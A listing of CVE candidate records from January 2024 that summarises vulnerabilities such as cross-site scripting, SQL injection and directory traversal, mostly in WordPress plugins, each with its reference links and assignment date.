CVE 2024 697 Candidate The Backuply – Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.2.3 via the node_id parameter in the backuply_get_jstree function. This makes it possible for attackers with administrator privileges or higher to read the contents of arbitrary files on the server, which can contain sensitive information. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026806%40backuply&new=3026806%40backuply&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026806%40backuply&new=3026806%40backuply&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/70effa22-fbf6-44cb-9d1b-8625969c10ac?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/70effa22-fbf6-44cb-9d1b-8625969c10ac?source=cve Assigned (20240118)
CVE 2024 696 Candidate A vulnerability, which was classified as problematic, was found in AtroCore AtroPIM 1.8.4. This affects an unknown part of the file /#ProductSerie/view/ of the component Product Series Overview. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251481 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://pasteboard.co/wsTTLjp5UEPq.png | URL:https://pasteboard.co/wsTTLjp5UEPq.png | MISC:https://vuldb.com/?ctiid.251481 | URL:https://vuldb.com/?ctiid.251481 | MISC:https://vuldb.com/?id.251481 | URL:https://vuldb.com/?id.251481 Assigned (20240118)
CVE 2024 695 Candidate A vulnerability, which was classified as problematic, has been found in EFS Easy Chat Server 3.1. Affected by this issue is some unknown functionality of the component HTTP GET Request Handler. The manipulation of the argument USERNAME leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251480. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://packetstormsecurity.com/files/176381/Easy-Chat-Server-3.1-Denial-Of-Service.html | URL:https://packetstormsecurity.com/files/176381/Easy-Chat-Server-3.1-Denial-Of-Service.html | MISC:https://vuldb.com/?ctiid.251480 | URL:https://vuldb.com/?ctiid.251480 | MISC:https://vuldb.com/?id.251480 | URL:https://vuldb.com/?id.251480 | MISC:https://www.exploitalert.com/view-details.html?id=40072 | URL:https://www.exploitalert.com/view-details.html?id=40072 | MISC:https://www.youtube.com/watch?v=nGyS2Rp5aEo | URL:https://www.youtube.com/watch?v=nGyS2Rp5aEo Assigned (20240118)
CVE 2024 694 Candidate ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2023-6620. Reason: This candidate is a reservation duplicate of CVE-2023-6620. Notes: All CVE users should reference CVE-2023-6620 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. Assigned (20240118)
CVE 2024 693 Candidate A vulnerability classified as problematic was found in EFS Easy File Sharing FTP 2.0. Affected by this vulnerability is an unknown functionality. The manipulation of the argument username leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251479. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://0day.today/exploit/description/39218 | URL:https://0day.today/exploit/description/39218 | MISC:https://packetstormsecurity.com/files/176377/Easy-File-Sharing-FTP-Server-2.0-Denial-Of-Service.html | URL:https://packetstormsecurity.com/files/176377/Easy-File-Sharing-FTP-Server-2.0-Denial-Of-Service.html | MISC:https://vuldb.com/?ctiid.251479 | URL:https://vuldb.com/?ctiid.251479 | MISC:https://vuldb.com/?id.251479 | URL:https://vuldb.com/?id.251479 | MISC:https://www.youtube.com/watch?v=Rcl6VWg_bPY | URL:https://www.youtube.com/watch?v=Rcl6VWg_bPY Assigned (20240118)
CVE 2024 692 Candidate The SolarWinds Security Event Manager was susceptible to Remote Code Execution Vulnerability. This vulnerability allows an unauthenticated user to abuse SolarWinds’ service, resulting in remote code execution. MISC:https://documentation.solarwinds.com/en/success_center/sem/content/release_notes/sem_2023-4-1_release_notes.htm | URL:https://documentation.solarwinds.com/en/success_center/sem/content/release_notes/sem_2023-4-1_release_notes.htm | MISC:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-0692 | URL:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-0692 Assigned (20240118)
CVE 2024 691 Candidate The FileBird plugin for WordPress is vulnerable to Stored Cross-Site Scripting via imported folder titles in all versions up to, and including, 5.5.8.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. It may also be possible to socially engineer an administrator into uploading a malicious folder import. MISC:https://plugins.trac.wordpress.org/changeset/3023924/filebird | URL:https://plugins.trac.wordpress.org/changeset/3023924/filebird | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/47f04985-dd9b-449f-8b4c-9811fe7e4a96?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/47f04985-dd9b-449f-8b4c-9811fe7e4a96?source=cve Assigned (20240118)
CVE 2024 690 Candidate An information disclosure flaw was found in ansible-core due to a failure to respect the ANSIBLE_NO_LOG configuration in some scenarios. Information is still included in the output in certain tasks, such as loop items. Depending on the task, this issue may include sensitive information, such as decrypted secret values. MISC:RHBZ#2259013 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2259013 | MISC:RHSA-2024:0733 | URL:https://access.redhat.com/errata/RHSA-2024:0733 | MISC:https://access.redhat.com/security/cve/CVE-2024-0690 | URL:https://access.redhat.com/security/cve/CVE-2024-0690 | MISC:https://github.com/ansible/ansible/pull/82565 | URL:https://github.com/ansible/ansible/pull/82565 Assigned (20240118)
CVE 2024 689 Candidate The Custom Field Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a meta import in all versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping on the meta values. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042177%40custom-field-suite&new=3042177%40custom-field-suite&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042177%40custom-field-suite&new=3042177%40custom-field-suite&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d8e967ce-fd36-44de-acca-c1985642ee5b?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d8e967ce-fd36-44de-acca-c1985642ee5b?source=cve Assigned (20240118)
CVE 2024 688 Candidate The "WebSub (FKA. PubSubHubbub)" plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 3.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024228%40pubsubhubbub&new=3024228%40pubsubhubbub&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024228%40pubsubhubbub&new=3024228%40pubsubhubbub&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f07b166b-3436-4797-a2df-096ff7c27a09?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f07b166b-3436-4797-a2df-096ff7c27a09?source=cve Assigned (20240118)
CVE 2024 687 Candidate The Restrict User Access – Ultimate Membership & Content Protection plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.5 via API. This makes it possible for unauthenticated attackers to obtain the contents of posts and pages via API. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037773%40restrict-user-access%2Ftrunk&old=3010745%40restrict-user-access%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037773%40restrict-user-access%2Ftrunk&old=3010745%40restrict-user-access%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f67684cd-3e0f-48bb-967a-16ea2b027843?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f67684cd-3e0f-48bb-967a-16ea2b027843?source=cve Assigned (20240118)
CVE 2024 686 Candidate ** REJECT ** Incorrect assignment Assigned (20240118)
CVE 2024 685 Candidate The Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to Second Order SQL Injection via the email address value submitted through forms in all versions up to, and including, 3.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to inject SQL in their email address that will append additional into the already existing query when an administrator triggers a personal data export. MISC:https://plugins.trac.wordpress.org/changeset/3028929/ninja-forms/trunk/includes/Admin/UserDataRequests.php | URL:https://plugins.trac.wordpress.org/changeset/3028929/ninja-forms/trunk/includes/Admin/UserDataRequests.php | MISC:https://sec.stealthcopter.com/ninja-contact-forms/ | URL:https://sec.stealthcopter.com/ninja-contact-forms/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb73d5d-ca4a-4103-866d-f7bb369a8ce4?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb73d5d-ca4a-4103-866d-f7bb369a8ce4?source=cve Assigned (20240118)
CVE 2024 684 Candidate A flaw was found in the GNU coreutils "split" program. A heap overflow with user-controlled data of multiple hundred bytes in length could occur in the line_bytes_split() function, potentially leading to an application crash and denial of service. MISC:RHBZ#2258948 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258948 | MISC:https://access.redhat.com/security/cve/CVE-2024-0684 | URL:https://access.redhat.com/security/cve/CVE-2024-0684 | MISC:https://www.openwall.com/lists/oss-security/2024/01/18/2 | URL:https://www.openwall.com/lists/oss-security/2024/01/18/2 Assigned (20240118)
CVE 2024 683 Candidate The Bulgarisation for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions in all versions up to, and including, 3.0.14. This makes it possible for unauthenticated and authenticated attackers, with subscriber-level access and above, to generate and delete labels. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/be759c83-a9df-4858-a724-28006a595404?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/be759c83-a9df-4858-a724-28006a595404?source=cve Assigned (20240118)
CVE 2024 682 Candidate The Page Restrict plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 2.5.5. This is due to the plugin not properly restricting access to posts via the REST API when a page has been made private. This makes it possible for unauthenticated attackers to view protected posts. MISC:https://wordpress.org/plugins/pagerestrict/ | URL:https://wordpress.org/plugins/pagerestrict/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/63f98fd6-eee8-4281-98ea-a267d0442c85?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/63f98fd6-eee8-4281-98ea-a267d0442c85?source=cve Assigned (20240118)
CVE 2024 681 Candidate The Page Restriction WordPress (WP) – Protect WP Pages/Post plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.3.4. This is due to the plugin not properly restricting access to pages via the REST API when a page has been made private. This makes it possible for unauthenticated attackers to view protected pages. The vendor has decided that they will not implement REST API protection on posts and pages and the restrictions will only apply to the front-end of the site. The vendors solution was to add notices throughout the dashboard and recommends installing the WordPress REST API Authentication plugin for REST API coverage. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034414%40page-and-post-restriction&new=3034414%40page-and-post-restriction&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034414%40page-and-post-restriction&new=3034414%40page-and-post-restriction&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a3e33a5c-df7c-4ef5-a59c-1c31abcda6d1?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a3e33a5c-df7c-4ef5-a59c-1c31abcda6d1?source=cve Assigned (20240118)
CVE 2024 680 Candidate The WP Private Content Plus plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 3.6. This is due to the plugin not properly restricting access to posts via the REST API when a page has been made private. This makes it possible for unauthenticated attackers to view protected posts. MISC:https://wordpress.org/plugins/wp-private-content-plus/ | URL:https://wordpress.org/plugins/wp-private-content-plus/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/43d8904f-3bc9-4c67-b44b-8d78762b6b30?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/43d8904f-3bc9-4c67-b44b-8d78762b6b30?source=cve Assigned (20240118)
CVE 2024 679 Candidate The ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins. MISC:https://themes.trac.wordpress.org/browser/colormag/3.1.2/functions.php#L237 | URL:https://themes.trac.wordpress.org/browser/colormag/3.1.2/functions.php#L237 | MISC:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=214568%40colormag&new=214568%40colormag&sfp_email=&sfph_mail= | URL:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=214568%40colormag&new=214568%40colormag&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e982d457-29db-468f-88c3-5afe04002dcf?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e982d457-29db-468f-88c3-5afe04002dcf?source=cve Assigned (20240118)
CVE 2024 678 Candidate The Order Delivery Date for WP e-Commerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'available-days-tf' parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/order-delivery-date/trunk/order_delivery_date.php#L221 | URL:https://plugins.trac.wordpress.org/browser/order-delivery-date/trunk/order_delivery_date.php#L221 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/71fb90b6-a484-4a70-a9dc-795cbf2e275e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/71fb90b6-a484-4a70-a9dc-795cbf2e275e?source=cve Assigned (20240118)
CVE 2024 676 Candidate Weak password requirement vulnerability in Lamassu Bitcoin ATM Douro machines, in its 7.1 version , which allows a local user to interact with the machine where the application is installed, retrieve stored hashes from the machine and crack long 4-character passwords using a dictionary attack. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines Assigned (20240118)
CVE 2024 675 Candidate Vulnerability of improper checking for unusual or exceptional conditions in Lamassu Bitcoin ATM Douro machines, in its 7.1 version, the exploitation of which could allow an attacker with physical access to the ATM to escape kiosk mode, access the underlying Xwindow interface and execute arbitrary commands as an unprivileged user. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines Assigned (20240118)
CVE 2024 674 Candidate Privilege escalation vulnerability in Lamassu Bitcoin ATM Douro machines, in its 7.1 version, which could allow a local user to acquire root permissions by modifying the updatescript.js, inserting special code inside the script and creating the done.txt file. This would cause the watchdog process to run as root and execute the payload stored in the updatescript.js. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines Assigned (20240118)
CVE 2024 670 Candidate Privilege escalation in windows agent plugin in Checkmk before 2.2.0p23, 2.1.0p40 and 2.0.0 (EOL) allows local user to escalate privileges FULLDISC:20240313 SEC Consult SA-20240307-0 :: Local Privilege Escalation via writable files in Checkmk Agent (CVE-2024-0670) | URL:http://seclists.org/fulldisclosure/2024/Mar/29 | MISC:https://checkmk.com/werk/16361 | URL:https://checkmk.com/werk/16361 Assigned (20240118)
CVE 2024 669 Candidate A Cross-Frame Scripting vulnerability has been found on Plone CMS affecting verssion below 6.0.5. An attacker could store a malicious URL to be opened by an administrator and execute a malicios iframe element. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-frame-scripting-xfs-plone-cms | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-frame-scripting-xfs-plone-cms Assigned (20240118)
CVE 2024 668 Candidate The Advanced Database Cleaner plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.3 via deserialization of untrusted input in the 'process_bulk_action' function. This makes it possible for authenticated attacker, with administrator access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. MISC:https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L224 | URL:https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L224 | MISC:https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L298 | URL:https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L298 | MISC:https://plugins.trac.wordpress.org/changeset/3025980/ | URL:https://plugins.trac.wordpress.org/changeset/3025980/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e0b8c24b-3e51-4637-9d8e-da065077d082?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e0b8c24b-3e51-4637-9d8e-da065077d082?source=cve Assigned (20240117)
CVE 2024 667 Candidate The Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.15.21. This is due to missing or incorrect nonce validation on the 'execute' function. This makes it possible for unauthenticated attackers to execute arbitrary methods in the 'BoosterController' class via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/form-maker/tags/1.15.21/booster/controller.php#L34 | URL:https://plugins.trac.wordpress.org/browser/form-maker/tags/1.15.21/booster/controller.php#L34 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027368%40form-maker&new=3027368%40form-maker&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027368%40form-maker&new=3027368%40form-maker&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d55c832b-f558-4e8a-8301-33dd38d39ef1?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d55c832b-f558-4e8a-8301-33dd38d39ef1?source=cve Assigned (20240117)
CVE 2024 665 Candidate The WP Customer Area plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 8.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3025865/customer-area/trunk/src/php/core-addons/admin-area/templates/dashboard-page.template.php | URL:https://plugins.trac.wordpress.org/changeset/3025865/customer-area/trunk/src/php/core-addons/admin-area/templates/dashboard-page.template.php | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024180%40customer-area&new=3024180%40customer-area&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024180%40customer-area&new=3024180%40customer-area&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/567d62ec-e868-45e2-b07a-8cc661d7c5e1?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/567d62ec-e868-45e2-b07a-8cc661d7c5e1?source=cve Assigned (20240117)
CVE 2024 664 Candidate The Meks Smart Social Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Meks Smart Social Widget in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027347%40meks-smart-social-widget&new=3027347%40meks-smart-social-widget&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027347%40meks-smart-social-widget&new=3027347%40meks-smart-social-widget&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/722aae99-fcfb-4234-9245-5db57aaa03c5?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/722aae99-fcfb-4234-9245-5db57aaa03c5?source=cve Assigned (20240117)
CVE 2024 663 Candidate ** REJECT ** : This is a false positive report. Assigned (20240117)
CVE 2024 660 Candidate The Formidable Forms – Contact Form, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.7.2. This is due to missing or incorrect nonce validation on the update_settings function. This makes it possible for unauthenticated attackers to change form settings and add malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3026901/formidable/tags/6.8/classes/controllers/FrmFormsController.php | URL:https://plugins.trac.wordpress.org/changeset/3026901/formidable/tags/6.8/classes/controllers/FrmFormsController.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b983d22b-6cd2-4450-99e2-88bb149091fe?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b983d22b-6cd2-4450-99e2-88bb149091fe?source=cve Assigned (20240117)
CVE 2024 659 Candidate The Easy Digital Downloads – Sell Digital Files (eCommerce Store & Payments Made Easy) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the variable pricing option title in all versions up to, and including, 3.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with shop manger-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?old_path=/easy-digital-downloads/tags/3.2.6&old=3030600&new_path=/easy-digital-downloads/tags/3.2.7&new=3030600&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=/easy-digital-downloads/tags/3.2.6&old=3030600&new_path=/easy-digital-downloads/tags/3.2.7&new=3030600&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1ec207cd-cae5-4950-bbc8-d28f108b4ae7?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1ec207cd-cae5-4950-bbc8-d28f108b4ae7?source=cve Assigned (20240117)
CVE 2024 658 Candidate The Insert PHP Code Snippet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user's name when accessing the insert-php-code-snippet-manage page in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033503%40insert-php-code-snippet&new=3033503%40insert-php-code-snippet&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033503%40insert-php-code-snippet&new=3033503%40insert-php-code-snippet&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c4a6b786-d0ef-41f6-b2bf-83307ec02b91?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c4a6b786-d0ef-41f6-b2bf-83307ec02b91?source=cve Assigned (20240117)
CVE 2024 657 Candidate The Internal Link Juicer: SEO Auto Linker for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings such as 'ilj_settings_field_links_per_page' in all versions up to, and including, 2.23.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033238%40internal-links&new=3033238%40internal-links&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033238%40internal-links&new=3033238%40internal-links&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/41d39fe4-b114-4612-92f6-75d6597610f7?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/41d39fe4-b114-4612-92f6-75d6597610f7?source=cve Assigned (20240117)
CVE 2024 656 Candidate The Password Protected – Ultimate Plugin to Password Protect Your WordPress Content with Ease plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Google Captcha Site Key in all versions up to, and including, 2.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034934%40password-protected&new=3034934%40password-protected&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034934%40password-protected&new=3034934%40password-protected&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/aba36c3b-beae-4c47-8aa8-5012a7a838ce?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/aba36c3b-beae-4c47-8aa8-5012a7a838ce?source=cve Assigned (20240117)
CVE 2024 655 Candidate A vulnerability has been found in Novel-Plus 4.3.0-RC1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /novel/bookSetting/list. The manipulation of the argument sort leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251383. MISC:https://github.com/red0-ZhaoSi/CVE/blob/main/novel-plus/sql/sql_1.md | URL:https://github.com/red0-ZhaoSi/CVE/blob/main/novel-plus/sql/sql_1.md | MISC:https://vuldb.com/?ctiid.251383 | URL:https://vuldb.com/?ctiid.251383 | MISC:https://vuldb.com/?id.251383 | URL:https://vuldb.com/?id.251383 Assigned (20240117)
CVE 2024 654 Candidate A vulnerability, which was classified as problematic, was found in DeepFaceLab pretrained DF.wf.288res.384.92.72.22. Affected is an unknown function of the file mainscripts/Util.py. The manipulation leads to deserialization. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. VDB-251382 is the identifier assigned to this vulnerability. MISC:https://github.com/bayuncao/vul-cve-4 | URL:https://github.com/bayuncao/vul-cve-4 | MISC:https://github.com/bayuncao/vul-cve-4/blob/main/picture/1071705290840_.pic_hd.jpg | URL:https://github.com/bayuncao/vul-cve-4/blob/main/picture/1071705290840_.pic_hd.jpg | MISC:https://vuldb.com/?ctiid.251382 | URL:https://vuldb.com/?ctiid.251382 | MISC:https://vuldb.com/?id.251382 | URL:https://vuldb.com/?id.251382 Assigned (20240117)
CVE 2024 652 Candidate A vulnerability was found in PHPGurukul Company Visitor Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file search-visitor.php. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251378 is the identifier assigned to this vulnerability. MISC:https://drive.google.com/file/d/1YHm4WtiYjbxNAd3FKo85qcdHfn1VJYEl/view?usp=sharing | URL:https://drive.google.com/file/d/1YHm4WtiYjbxNAd3FKo85qcdHfn1VJYEl/view?usp=sharing | MISC:https://vuldb.com/?ctiid.251378 | URL:https://vuldb.com/?ctiid.251378 | MISC:https://vuldb.com/?id.251378 | URL:https://vuldb.com/?id.251378 Assigned (20240117)
CVE 2024 651 Candidate A vulnerability was found in PHPGurukul Company Visitor Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file search-visitor.php. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251377 was assigned to this vulnerability. MISC:https://drive.google.com/file/d/1J3YaxX9RYZ_41-AYdwrCAPMT-YTqILKr/view?usp=sharing | URL:https://drive.google.com/file/d/1J3YaxX9RYZ_41-AYdwrCAPMT-YTqILKr/view?usp=sharing | MISC:https://vuldb.com/?ctiid.251377 | URL:https://vuldb.com/?ctiid.251377 | MISC:https://vuldb.com/?id.251377 | URL:https://vuldb.com/?id.251377 Assigned (20240117)
